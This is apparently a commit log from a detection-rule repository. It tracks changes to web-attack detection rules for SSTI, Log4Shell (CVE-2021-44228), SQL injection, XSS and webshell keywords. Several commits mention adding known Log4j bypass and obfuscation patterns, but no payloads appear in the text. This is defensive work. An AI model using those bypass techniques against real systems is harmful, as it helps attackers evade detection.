a2d19f3db2
Add FP filter + FP remark
2022-06-15 11:48:15 +01:00
9f0989e49c
Quick typo fix
2022-06-15 11:38:34 +01:00
894f6af09f
Removed double quotes
2022-06-15 11:30:01 +01:00
ee23e653f9
Added "GET" method selection
2022-06-15 11:29:31 +01:00
e42318b0fb
Update web_ssti_in_access_logs.yml
2022-06-14 22:10:09 +01:00
b54df8d9ce
Rename+Update
2022-06-14 21:58:34 +01:00
f527b8eb4c
Rename Web CVE Rules
...
Renamed WEB CVE rules to the format "web_cve_20XX_XXXX_rest_of_name"
2022-06-14 19:22:26 +01:00
00db705ae6
Rename Web Rule
2022-06-14 19:13:15 +01:00
d3d5f4faea
Update web_susp_windows_path_uri.yml
2022-06-07 10:45:06 +02:00
7327dd53e5
New/Update Rules
...
- Renamed "sql_injection_keywords.yml" to "web_sql_injection_keywords.yml" to conform with the rest of the rule in the WEB directory
- Renamed "xss_keywords.yml" to "web_xss_keywords.yml" to conform with the rest of the rule in the WEB directory
- Renamed "proc_create_win_msdt_susp_parent.yml" to "proc_creation_win_msdt_susp_parent.yml" to conform with other process creation rules
- Renamed "proc_create_win_sdiagnhost_susp_child.yml" to "proc_creation_win_sdiagnhost_susp_child.yml" to conform with other process creation rules
- Moved the rule "win_powershell_snapins_hafnium.yml" to process_creation folder instead of the WEB folder
- Created "web_susp_windows_path_uri.yml" to detect URI that contains susp windows paths
- Updated the description "web_webshell_keyword.yml" and added 3 more cases
- Created "file_event_win_cve_2021_44077_poc_default_files.yml" to detect the default dropped file from the POC of CVE-2021-44077 (Showcased in the DFIR report)
- Created "proc_creation_win_renamed_plink.yml" to detect renamed usage of "Plink"
2022-06-06 21:16:52 +01:00
3b4ad16c5f
refactor: new expr from honeypot, increased level
2022-06-06 17:32:08 +02:00
b3d9706014
Update web_java_in_access_log.yml
2022-06-04 15:21:04 +02:00
f4c61c58f6
Update web_java_in_access_log.yml
2022-06-04 13:39:36 +02:00
6af060a91f
Add new string
2022-06-04 10:08:49 +02:00
e886b08755
add web_java_in_access_log
2022-06-04 08:46:14 +02:00
97856b562a
Add "\" to "Image|endswith" modifier
...
- Added the "\\" (backslash) for the "(Parent)Image|endswith" modifiers to avoid possible confusion.
- The modification were mostly done on default windows binaries to avoid changing logic of other rules.
2022-06-02 13:39:07 +01:00
74b9f97b9c
Renamed suspicious in filenames to susp
2022-05-19 09:37:04 +02:00
112b715dd6
chore: test rules: reactivate single value list check
2022-05-10 17:13:04 +02:00
dbd68bf3f0
chore: test rules: capitalization on FP list entries
...
Entires to the false positive list should begin with
a capital letter. e.g. Unkown instead of unkown.
Fixed the existing rules accordingly
2022-05-09 16:07:44 +02:00
e91fc4486e
refactor: first bigger log source refactoring
...
see discussion here: https://github.com/SigmaHQ/sigma/discussions/2835
2022-03-22 17:58:29 +01:00
84d0c472ba
fix: remove penetration test as valid false positive reason
2022-03-16 14:33:18 +01:00
8d3f8acb60
fix: none --> Unknown
2022-03-16 14:19:21 +01:00
4585133325
fix: remove penetration testing as a valid false positive
2022-03-16 13:51:26 +01:00
b23eee6ebf
fix: unknown --> Unknown
2022-03-16 13:43:54 +01:00
35d4c8bc69
fix: FPs noticed in THOR testing
2022-02-21 10:15:27 +01:00
e2aa3665af
fix: avoid Microsoft Defender detections
...
We keep the strings as specific as necessary while avoiding Microsoft Defender detections on the rule files
2022-02-06 08:56:54 +01:00
4631d0c482
remove invalid tag
2022-01-19 18:23:30 +01:00
f7e670d55e
Simple Quote
2022-01-11 13:40:53 +01:00
e055ec1d52
refactor: change all " of them" expressions
2022-01-11 10:59:57 +01:00
c6014b1205
Change status to test
2022-01-07 07:04:24 +01:00
73f258e2d1
Change double quote to quote
2022-01-06 14:02:35 +01:00
44fecf8ebd
typo
2021-12-16 12:12:37 -05:00
05245b5ac7
implemented @frack113 1 of selection* suggestion
2021-12-16 12:09:39 -05:00
972dfbc4d2
Log4j OR each section vs implicit AND
...
When the original is compiled it requires one TRUE from each Field (implicit AND) ... believe the intent is to search all fields of any trace which hence explicit OR in "condition"
2021-12-16 01:53:33 -05:00
baa5d3758d
Merge branch 'master' into rule-devel
2021-12-13 18:05:17 +01:00
51a4315ab9
fix: referrer > referer adjustments
2021-12-13 15:47:43 +01:00
fb167c5698
Merge pull request #2446 from izysec/patch-4
...
Added current known bypass patterns
2021-12-13 14:04:54 +01:00
7b93291439
Merge pull request #2445 from izysec/patch-3
...
Added current known bypass patterns
2021-12-13 14:03:59 +01:00
04ff26c786
Update web_cve_2021_44228_log4j_fields.yml
2021-12-13 11:47:55 +01:00
ea3f1c6228
changed expression
...
the last part is already covered by the expression in line 38 but we can add the one that obfuscates the `jndi`
2021-12-13 11:47:12 +01:00
5819aa9888
Added current known bypass patterns
...
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
2021-12-13 15:51:25 +05:30
6c8b0c8fd8
Added current known bypass patterns
...
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
2021-12-13 15:49:08 +05:30
758334ac1c
Merge branch 'rule-devel' of https://github.com/SigmaHQ/sigma into rule-devel
2021-12-13 09:02:38 +01:00
ef6fb35e2b
more patterns for log4shell
2021-12-13 09:02:24 +01:00
d8613fedfe
more Log4Shell patterns
2021-12-12 21:27:01 +01:00
31ddcd4a0d
Log4Shell - more patterns
2021-12-12 20:39:09 +01:00
39217d4b44
rule: JNDIExploit
2021-12-12 13:16:05 +01:00
63bb7673d6
Merge branch 'master' into rule-devel
2021-12-12 12:47:33 +01:00
5da7537375
Merge pull request #2436 from izysec/patch-1
...
Additional IoC keywords added log4j detection
2021-12-12 12:46:36 +01:00
23f59180d5
updated Log4Shell rules
2021-12-12 12:40:14 +01:00
Nasreddine Bencherchali